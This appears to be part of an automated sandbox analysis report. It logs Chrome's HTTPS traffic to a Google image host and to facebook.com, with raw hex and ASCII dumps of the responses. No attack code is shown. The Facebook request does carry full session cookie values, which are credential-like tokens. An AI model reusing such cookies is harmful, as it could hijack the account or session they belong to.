                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: bf ec de 70 20 cb 93 14 1f f0 90 5e 50 59 7b 96 cd 34 9d f7 d7 e7 e5 37 33 6a 44 44 27 5b 24 d4 66 9e 99 85 b3 cb 27 89 07 c2 3c d8 15 a9 61 ea 96 5a c3 01 ba 6a 7b 61 3a 93 19 e3 e5 f3 fa 2d 00 c6 a2 b2 9a 30 0d 76 36 10 0e 3e 9d 16 82 bd 93 8c 66 23 95 23 55 46 94 fd 97 5c 43 07 ea a8 02 9a 06 24 96 d3 60 43 a8 35 66 8f 39 00 76 b0 a6 a4 22 3c d7 17 75 8d 4e 52 34 1d ed 50 1d 4d c0 ca 19 62 84 e5 6d 68 f9 65 5b 2f 57 76 fc 15 e6 7c db f8 ca b4 f8 3a 3a 99 62 98 84 5e a8 26 fd 03 1a c4 b5 33 cf cc 21 65 e9 2b 67 ab bc bd 31 6f bc d4 41 a6 cd b3 28 fa 08 3e 95 dc ca 83 49 fa 26 01 89 f9 41 70 c5 8f c5 34 2b 0d d7 5f 4c e9 5e 00 4c e7 53 e7 be 1a 26 62 3b 70 cb b1 5a 2d 79 06 35 f3 41 2a 2d 72 1d 85 88 b5 b5 2b bd e8 0a d8 72 40 0f ab ba 29 77 ba 16 38 f6
                                                                                                                                                                                                                                Data Ascii: p ^PY{473jDD'[$f'<aZj{a:-0v6>f##UF\C$`C5f9v"<uNR4PMbmhe[/Wv|::b^&3!e+g1oA(>I&Ap4+_L^LS&b;pZ-y5A*-r+r@)w8
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 39 98 d1 e2 e1 23 df a5 e5 24 b2 81 f6 0a 40 89 27 6b 8f 75 53 a0 bb 1d cd fa ba 2a 56 3b 32 8d 80 cd 54 2d 41 b3 7b e9 b6 c4 60 7e ec 20 39 30 c3 63 34 43 17 7a 9f bf 0c 46 1b fc f2 82 c2 7a ee 7e 29 b5 50 81 96 d6 3c 2d 76 28 dd e6 74 9b e2 84 00 b3 47 a2 f7 23 9e 29 b3 0f c0 bc 8f bb bf a2 c4 8c 74 ee e8 66 04 e7 e2 c6 86 27 ec 06 38 44 f4 5c fb 88 35 1b 58 5e 7b a1 dd 7d 81 5d 19 88 9f b5 c7 e1 31 4f 17 48 89 92 83 78 79 3d 29 8e be fa 96 c6 39 4a fb 30 0b 7d 62 d8 33 75 16 14 89 36 2d 7b 61 7d b1 22 15 88 9c 1c 80 0d 45 de 58 12 9a 32 d8 47 3b ff fb 79 98 0f 86 15 e5 c2 3a bf 6a e1 12 40 69 f4 42 2e d9 57 b6 63 36 45 39 cb 63 c9 3d ee c9 9e 83 3e 54 ab 91 a2 dc 80 0d fd 92 63 41 72 4b 01 8d fa 0b c4 59 60 de 6a 00 53 43 8e f7 7e 26 9f ef 0b 7b 77 15
                                                                                                                                                                                                                                Data Ascii: 9#$@'kuS*V;2T-A{`~ 90c4CzFz~)P<-v(tG#)tf'8D\5X^{}]1OHxy=)9J0}b3u6-{a}"EX2G;y:j@iB.Wc6E9c=>TcArKY`jSC~&{w
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC7INData Raw: d2 5c 04 ed 30 00 00
                                                                                                                                                                                                                                Data Ascii: \0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                129192.168.2.450030216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC529OUTGET /LCVRRBHTcHs2NFs14MsnVMA51vENNhT-VUex4HRMXuBZmVJ1b6lJOTJnwC5LcSPurg=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 11894
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 02:51:53 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 02:51:53 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 7373
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC856INData Raw: 52 49 46 46 6e 2e 00 00 57 45 42 50 56 50 38 20 62 2e 00 00 b0 9e 00 9d 01 2a a6 00 28 01 3e 61 28 90 45 24 22 a1 97 1b 2e 4c 40 06 04 b5 04 38 00 f8 00 cd 77 35 ff 1b f8 e5 dc 61 d9 3c 3f e4 6f b4 af 20 f6 27 eb 2f ba 7e a7 fe db f3 c5 fb 9e e5 3e 5b c8 9b 9c bf e3 7f 88 fe ed fb 25 f3 33 fd 17 fc 4f 66 5f a2 bf ea 7b 81 fe a5 ff bb fe df f9 01 dd 67 f7 4b d4 57 f4 af ee 9f fa 7f c9 7b c5 7f d0 fd c0 f7 59 fd fb d4 03 fa d7 fb 2f ff fe d5 3f ef ff ff fb 98 ff 77 ff 7b ff d3 dc 03 f9 97 fb 2f 4d af dc cf 84 8f ed ff f1 7f 71 3e 06 7f 67 ff f9 fb 00 7f f4 f5 00 e9 f7 eb df f6 5f 46 fe 18 fe 37 f2 8f ce df 2a 5e f1 fd eb f6 eb d8 ff 21 7c 61 fa 11 fc e3 f0 b7 e9 3f c2 fe e3 fb 5d ff 13 c4 bf 9c bf eb fa 85 fe 5b fc e3 fd 1f e6 b7 f7 7f 8e df be ee 67 b8 5f
                                                                                                                                                                                                                                Data Ascii: RIFFn.WEBPVP8 b.*(>a(E$".L@8w5a<?o '/~>[%3Of_{gKW{Y/?w{/Mq>g_F7*^!|a?][g_
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: a1 7f 7c cf 63 f1 17 a5 2c ae 95 ab e2 c5 d1 d4 e2 3e db 7f 63 93 d4 8b d8 77 c8 43 08 e4 ca 79 c1 39 26 c1 2f dd 22 f9 eb 5c 30 3d 71 5e 58 3f 73 4e 60 23 e3 d9 fc 58 d4 87 9d c3 16 a8 eb c5 15 9d 47 09 80 d2 d7 a4 9b 80 ec 3e 6b f4 39 93 1d b3 eb 0e be c3 94 a9 40 f5 3c 86 3b f6 34 ca 72 24 52 b3 31 5b 9e 26 13 9c 7e 62 8e 39 2e 94 41 b0 eb c1 7f 7a a7 2d f1 dc a6 c0 40 94 fe 69 03 ca d9 25 fc 6f 91 27 60 86 8d 66 3b e0 b7 ce 67 14 1c 3b eb 8b eb eb 0e 1a ef ad b1 9f 80 71 73 3f 88 83 ae 00 54 6b c4 b4 a1 5b 53 27 24 d9 c9 5b 28 d6 9d 67 e7 84 b4 8c 4f e1 96 67 c2 bf 93 0f c8 0c 7f d3 d9 28 1a 24 60 09 4b a0 c6 e8 af 33 a5 87 5b be ac 48 a7 b5 11 c5 97 c3 d6 d7 33 3f da db bf ae cb de 7b 0d c5 f9 90 9e 85 64 17 53 ef 8a af fd 87 75 b0 5b 0e c4 1b 6e 5e
                                                                                                                                                                                                                                Data Ascii: |c,>cwCy9&/"\0=q^X?sN`#XG>k9@<;4r$R1[&~b9.Az-@i%o'`f;g;qs?Tk[S'$[(gOg($`K3[H3?{dSu[n^
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: b5 54 4a 66 f8 01 79 35 79 c4 bc 82 80 28 c2 92 11 cf 0a 76 49 d6 0d 30 44 9e 59 9f ec fa ec c5 7a a6 48 bb aa 09 2f 8e e7 e2 32 9e 9a 2c 10 45 fd 35 f2 55 89 93 0f 0c fe 85 71 0a 0f 83 1a c3 e9 76 b0 67 63 6d ac 3a 4f ad 6e 2b 63 04 11 6f 96 96 3e 9e 28 16 60 4d 4f 76 c6 89 64 05 6f 03 d7 d2 92 d8 60 82 81 f8 ce 55 de f0 79 2c 62 20 84 9f 61 90 78 d0 d6 3e c3 42 99 f2 cf 06 72 80 0b 1a c4 29 ab 3b ee 39 6a 2f ae 5a 89 dc 6e 61 ef af f1 5d 47 75 51 73 e6 1e a5 ea 77 d6 66 5b ca 36 82 bf 9c 3f f1 9e e6 1a 88 f0 ab 32 08 6c 44 5e 23 b7 e4 7b 2b 98 0f 11 ea 62 ee 56 62 44 43 19 61 f5 52 58 1e 6a a6 0f 77 25 94 4f de 9d 00 7e 33 7e 9e 71 3b 49 88 59 c4 a2 ab 4e 13 16 a6 9b 55 b2 34 bb c5 c7 4f 24 ca 79 a2 90 c5 6a 57 e0 07 e8 fe 4c 78 21 52 10 fd 1e f7 b8 d1
                                                                                                                                                                                                                                Data Ascii: TJfy5y(vI0DYzH/2,E5Uqvgcm:On+co>(`MOvdo`Uy,b ax>Br);9j/Zna]GuQswf[6?2lD^#{+bVbDCaRXjw%O~3~q;IYNU4O$yjWLx!R
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 54 52 ea 62 1a 46 87 45 ad 03 88 02 1e b5 fd 37 b5 53 43 9b 87 d4 00 36 89 0c 14 a3 bc b3 bd 5a 6b 5e 31 58 a2 c5 c1 f7 03 a3 ff f2 28 65 c3 b1 e3 34 29 b0 33 b9 f1 15 f7 dc 36 dd ba 91 b4 f2 44 05 73 79 af 43 b7 81 b0 5e 38 30 73 a1 35 44 f3 2c c5 ad 9b 0e ce af 66 99 7c f6 01 40 44 44 d5 8b ae 71 17 6f 83 8d bf 0b 34 9b 05 db 0c 58 e1 86 4e dd ca 80 5f f3 9b 50 db d4 c9 0d 8c 02 0a 9d 55 49 54 82 c5 66 c4 e6 87 1a b5 78 07 a5 21 f6 e7 40 ab 6d ff e5 41 af 98 81 cd bf 10 b4 10 e1 ec 7b 8d f0 09 0f 48 c2 c0 2f 2d 4e b2 4e 85 63 e3 f8 c2 e0 10 64 17 f1 2c ff 01 43 90 d5 f2 3d 4f d2 df a7 9a 0c 7a 1e 8b 8a 89 94 a9 e8 cb 68 f2 5b 66 18 dd ee 70 cb fc 1b c4 b0 63 11 74 a1 f7 29 b8 63 df 0c 41 24 e6 27 46 17 ec 56 1f 5a 3b 01 4b 1c 4a e6 d5 60 bc 6b 2e ac 48
                                                                                                                                                                                                                                Data Ascii: TRbFE7SC6Zk^1X(e4)36DsyC^80s5D,f|@DDqo4XN_PUITfx!@mA{H/-NNcd,C=Ozh[fpct)cA$'FVZ;KJ`k.H
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 98 f4 49 d7 0c ce fa e0 41 ba f4 12 bf 58 7a 87 85 73 9f 77 63 28 e7 84 16 b3 c5 02 b7 4f 88 ce e2 c0 7e b2 f7 9d e3 27 0a f6 49 99 c5 2d f4 43 d6 d5 84 b7 45 fe 11 0c 24 1d e0 63 f2 db a5 78 c9 44 e3 85 76 ab 79 b8 3a ac cc f6 2f 50 9c 22 b0 24 1b 0c a5 61 20 03 13 20 45 ee a3 b8 6b f4 cf df 00 9c 82 6b 87 3d ae 80 b5 52 b7 b0 1f d8 78 35 57 b8 2a c3 b4 95 bb de 7c 8c 01 ed cb 82 66 2e a9 02 14 ff 13 8c d3 98 be 23 88 4d e0 13 28 14 8e c7 bc dd be be 79 e4 30 56 04 f1 5c 1f a8 71 e3 06 7a cf e3 a9 f8 cc 7a a2 81 dd 05 25 fd cf c5 7e ce a8 6c 6e 5b 1e ae 84 29 00 29 ff 98 24 25 89 0c 73 7e 97 a8 b8 7e ba 5d 6f 46 d6 a7 91 b8 3c 0d 8d e8 9a 48 0c b4 10 d5 a0 d9 d8 3b 34 e1 f2 40 d9 93 ee 66 ef 93 40 09 af 52 fb dd 15 86 df 09 11 ad 57 c6 c6 7c 72 07 ce 18
                                                                                                                                                                                                                                Data Ascii: IAXzswc(O~'I-CE$cxDvy:/P"$a Ekk=Rx5W*|f.#M(y0V\qzz%~ln[))$%s~~]oF<H;4@f@RW|r
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 08 83 40 8a a6 74 09 2d 3c 89 eb 1b ae 50 98 c8 c7 3c fa ce 2f 2f 2c 65 48 c5 d1 a0 a6 d4 88 2e db ba 2c 1d ec a5 95 f7 11 e1 82 bd c8 94 1a 75 90 77 50 5c f8 20 04 a0 01 55 d0 bc 6e 65 18 92 03 7e 39 60 9b 47 61 bc 02 22 ff 33 c8 da 71 b1 e0 e0 bb a1 82 fd de 75 43 b4 ab 1c 93 2d fc c0 09 76 49 19 76 c9 1a 3f f7 e9 fe cd e2 99 a8 e8 5a 54 a8 57 55 cc 17 46 14 75 a0 d5 5e 69 e5 3e 82 b0 c9 bc 0f 11 41 93 be f3 f0 4c 6d d0 6d 47 e0 88 2c 2f c0 8e ad f7 e0 83 cf 1f 62 37 b1 dd 50 47 2b a5 81 dc 60 25 3b 07 e7 58 6c a8 07 b7 8e 56 fa c6 02 f2 df e7 7d b9 5b 5c 9b 44 99 b3 a3 47 09 ce 77 ad e7 61 28 b3 d4 ea fc db ea 10 63 90 32 3e 9e 52 e2 80 73 bc d3 dc b1 37 0e ed 8a f7 2c f0 d5 a9 f5 16 83 d8 da 22 3c 7b 59 be 41 be 8a 11 58 30 64 ed 4d 8c 96 d9 c9 64 b9
                                                                                                                                                                                                                                Data Ascii: @t-<P<//,eH.,uwP\ Une~9`Ga"3quC-vIv?ZTWUFu^i>ALmmG,/b7PG+`%;XlV}[\DGwa(c2>Rs7,"<{YAX0dMd
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 16 04 c2 55 98 29 7c 2c 8d 45 7a 81 99 9f ac b9 ca 48 42 80 54 99 07 ef 85 03 f7 d1 fb 4e 0e 6f 28 ee 23 68 2b b3 d7 ef 76 e7 05 69 2f eb 5d 59 82 4e 71 2a 97 c2 70 1d f3 53 8e bf 0c ea e2 d3 38 e6 9f df dc e5 c0 22 f1 d0 af 01 dc e9 03 bf fc 38 72 51 4f a0 e6 33 24 57 13 af bd 86 52 6c 7e 5d cf b6 1b 23 35 b2 62 9a e3 bb 9b fc ab 36 47 9f 4b 2f 00 80 ec 4b 45 59 e1 24 18 a2 33 37 5a d0 60 b2 c2 5c 26 88 d8 83 24 ed 32 a4 ae 2e 17 a6 84 07 d6 c1 24 0d 0f fd 8a 3d 44 10 27 71 c2 78 74 bc 9c f4 bf d6 99 b7 33 43 81 db 5c 5f 15 af 36 78 da ff a1 20 16 57 4c 5a 13 86 ed 37 bc 04 c5 85 d4 5e ca a4 58 0c ea c5 ab f5 70 5b 83 aa e4 bd e4 54 e2 ac 35 70 dc 36 b6 ed 00 9a 04 35 27 65 b8 f5 4f bc b2 b4 09 80 4b 9e a4 9d ad 69 36 f0 61 b8 98 50 97 58 68 76 7e b9 9d
                                                                                                                                                                                                                                Data Ascii: U)|,EzHBTNo(#h+vi/]YNq*pS8"8rQO3$WRl~]#5b6GK/KEY$37Z`\&$2.$=D'qxt3C\_6x WLZ7^Xp[T5p65'eOKi6aPXhv~
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: ff 7c 3c 91 a9 55 b3 15 cf 30 19 d1 fe 9b ad f1 2c 8b ab 2f 21 a9 0f 4f d3 46 4e a9 5f 7f 6f 9e 8f c7 32 23 d7 33 3c 0f 37 fc 3c 20 46 55 b4 86 ac 1f ed 13 d0 a7 86 3f 1a a9 e0 98 dc aa 03 d2 ac 4e ef a2 bb a0 98 f9 2d cb 23 36 74 4a 81 56 81 2b 40 60 3f f9 c3 d7 8c 3c 25 8d 4d da 07 b1 ec 07 fa e1 97 29 c1 a6 33 89 5f 7f 91 56 b9 82 44 92 53 d0 62 a0 5c 43 b0 1c d0 9a 98 5a f0 41 ca 58 77 76 7a a9 16 f3 2b c7 be 21 b0 9d 79 ad a0 a7 86 0d 7c 77 54 fb 31 33 61 06 4e cd 0f e4 37 75 bd 7f ba 64 c6 b0 17 bf ea e6 ed 32 22 c6 22 ab 29 69 70 3f 4f 47 2b 67 65 40 a6 96 52 0d b7 8c be e7 7e 77 fb e1 df ea b0 f5 80 5e f9 61 e7 34 48 e8 62 bf 67 b8 8b 56 97 61 d4 d5 09 b3 6f 0a 46 c4 db a7 8c 1b 23 23 11 15 d0 b6 b4 f9 54 9a 47 47 35 f1 6a be 23 96 b9 81 1a d6 9e
                                                                                                                                                                                                                                Data Ascii: |<U0,/!OFN_o2#3<7< FU?N-#6tJV+@`?<%M)3_VDSb\CZAXwvz+!y|wT13aN7ud2"")ip?OG+ge@R~w^a4HbgVaoF##TGG5j#
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1308INData Raw: c0 d8 fe 7f e0 90 fe 6a 47 f5 9f ed 87 f9 0e de 85 5e cf 8a 35 44 c3 11 0d af 9d 76 3a 4f d8 25 6a 3c 72 8a 03 2b 01 91 7f 3e 3e b8 77 4a 45 16 5e 42 b2 93 03 2f 0e 51 5a 89 1a 06 78 9d 15 27 c8 f1 65 4a 5c 10 3f 92 e2 80 fd de 58 e4 07 8f a5 ab d8 b9 2e cf b4 bd 25 8f ee b9 da 1b 6c ac d8 1f 18 1c 32 c8 cd 2e bd f3 bb 6e a4 03 cf da f4 68 ed 30 9a b3 4c c5 ce f4 6d 24 93 4a 8c 14 c5 48 9f 49 e5 ab b4 e8 a9 ab e8 99 57 6c 4d b5 a5 b6 2d d7 b3 5f b1 61 6c 55 1f 39 cf 8e a9 28 a3 35 c4 e4 03 a4 a8 6f 6a 3f b9 b5 67 05 7c 2e 68 4c 3c 4e a7 ea 47 6b 89 a9 5e e0 61 62 d1 5e 46 93 28 eb c8 ec 8d 84 e8 23 2c e5 0f 2a 42 28 f6 dd 67 7d f3 29 4b 6b 72 5a e8 65 87 df fa 36 52 f0 71 72 a4 35 d0 9b 86 c5 fd b6 0d 22 4d 05 3d ea ae ec 7e 32 5f c6 6e 08 ff c4 49 c8 49
                                                                                                                                                                                                                                Data Ascii: jG^5Dv:O%j<r+>>wJE^B/QZx'eJ\?X.%l2.nh0Lm$JHIWlM-_alU9(5oj?g|.hL<NGk^ab^F(#,*B(g})KkrZe6Rqr5"M=~2_nII


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                130192.168.2.450045157.240.251.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:49 UTC516OUTGET /ajax/webstorage/process_keys/?state=1 HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
                                                                                                                                                                                                                                2024-09-29 04:54:49 UTC310INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                X-FB-Debug: +grB58efBfa0XYEvgoDivPiWppVGHsfHTQInZX9pwgn7yVVAlyuNccAn7DkkF9bFeGiXoKVj98twSvZrEC7s+A==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:49 GMT
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                2024-09-29 04:54:49 UTC2670INData Raw: 50 72 6f 78 79 2d 53 74 61 74 75 73 3a 20 68 74 74 70 5f 72 65 71 75 65 73 74 5f 65 72 72 6f 72 3b 20 65 5f 66 62 5f 63 6f 6e 66 69 67 76 65 72 73 69 6f 6e 3d 22 41 63 49 7a 66 53 41 50 46 42 64 6a 63 30 53 67 69 63 62 30 67 48 74 35 68 43 4a 6c 37 6b 44 5f 73 51 74 57 6a 73 4f 2d 55 47 7a 61 61 64 34 50 66 58 6e 7a 76 6f 48 37 76 44 57 76 37 77 22 3b 20 65 5f 63 6c 69 65 6e 74 61 64 64 72 3d 22 41 63 49 68 77 42 4f 54 39 74 4b 73 57 65 77 6c 57 36 52 4d 37 64 58 47 6b 45 4c 41 6f 45 2d 70 69 41 4f 59 2d 41 4e 49 69 36 4d 49 5a 4a 48 4e 77 66 42 73 45 70 76 56 6c 6f 36 33 55 4c 51 49 64 79 47 6e 52 49 61 41 66 49 54 71 36 6c 43 50 49 4e 64 5a 50 77 6b 45 48 59 4e 6e 55 58 54 55 73 67 47 63 38 6b 54 68 6e 43 31 48 55 2d 76 54 55 51 22 3b 20 65 5f 66 62 5f
                                                                                                                                                                                                                                Data Ascii: Proxy-Status: http_request_error; e_fb_configversion="AcIzfSAPFBdjc0Sgicb0gHt5hCJl7kD_sQtWjsO-UGzaad4PfXnzvoH7vDWv7w"; e_clientaddr="AcIhwBOT9tKsWewlW6RM7dXGkELAoE-piAOY-ANIi6MIZJHNwfBsEpvVlo63ULQIdyGnRIaAfITq6lCPINdZPwkEHYNnUXTUsgGc8kThnC1HU-vTUQ"; e_fb_
                                                                                                                                                                                                                                2024-09-29 04:54:49 UTC51INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: Alt-Svc: h3=":443"; ma=86400Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:49 UTC1469INData Raw: 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 0d 0a 64 35 37 39 0d 0a 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6a 6b 4b 5a 69 65 49 43 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29
                                                                                                                                                                                                                                Data Ascii: 53<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="ud579tf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="jkKZieIC">function envFlush(a){function b(b){for(var c in a)
                                                                                                                                                                                                                                2024-09-29 04:54:49 UTC1500INData Raw: 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 62 2f 72 2f 68 4c 52 4a 31 47 47 5f 79 30 4a 2e 69 63 6f 22 20 2f 3e 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 58 2f 6c 2f 30 2c 63 72 6f 73 73 2f 63 61 63 34 39 51 74 47 32 4c 64 2e 63 73 73 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 77 58 61 56 6f 6c 67 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22
                                                                                                                                                                                                                                Data Ascii: //static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0,cross/cac49QtG2Ld.css" data-bootloader-hash="wXaVolg" crossorigin="anonymous" /><link type="text/css" rel="
                                                                                                                                                                                                                                2024-09-29 04:54:49 UTC1500INData Raw: 57 57 57 4f 72 4d 6f 62 69 6c 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 57 57 57 4f 72 4d 6f 62 69 6c 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 34 33 34 34 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 57 57 57 4f 72 4d 6f 62 69 6c 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 57 57 57 4f 72 4d 6f 62 69 6c 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 36 36 34 30 22 2c 5b 22 50 72 6f 6d 69 73 65 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 50 72 6f 6d 69 73 65 49 6d 70 6c 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 35 38 22 2c 5b 22 46 42 4a 53 4f 4e 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 46 42 4a 53 4f 4e 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22
                                                                                                                                                                                                                                Data Ascii: WWWOrMobile"],{"__rc":["clearTimeoutWWWOrMobile",null]},-1],["cr:4344",["setTimeoutWWWOrMobile"],{"__rc":["setTimeoutWWWOrMobile",null]},-1],["cr:6640",["PromiseImpl"],{"__rc":["PromiseImpl",null]},-1],["cr:8958",["FBJSON"],{"__rc":["FBJSON",null]},-1],["
                                                                                                                                                                                                                                2024-09-29 04:54:49 UTC1500INData Raw: 74 61 67 52 65 64 69 72 65 63 74 22 3a 74 72 75 65 2c 22 66 72 61 67 42 6c 61 63 6b 6c 69 73 74 22 3a 5b 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74 68 5f 74 6f 6b 65 6e 22 2c 22 78 73 22 2c 22 63 68 65 63 6b 70 6f 69 6e 74 5f 64 61 74 61 22 2c 22 63 6f 64 65 22 5d 7d 2c 31 33 37 5d 2c 5b 22 43 6f 6f 6b 69 65 50 72 69 76 61 63 79 53 61 6e 64 62 6f 78 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 69 73 5f 61 66 66 65 63 74 65 64 5f 62 79 5f 73 61 6d 65 73 69 74 65 5f 6c 61 78 22 3a 66 61 6c 73 65 7d 2c 37 37 32 33 5d 2c 5b 22 43 6f 6d 65 74 50 65 72 73 69 73 74 51 75 65 72 79 50 61 72 61 6d 73 22 2c 5b 5d 2c 7b 22 72 65 6c 61 74 69 76 65 22 3a 7b 7d 2c 22 64 6f 6d 61 69 6e 22 3a 7b 7d 7d 2c 36 32 33 31 5d 2c 5b 22 43 6f 6f
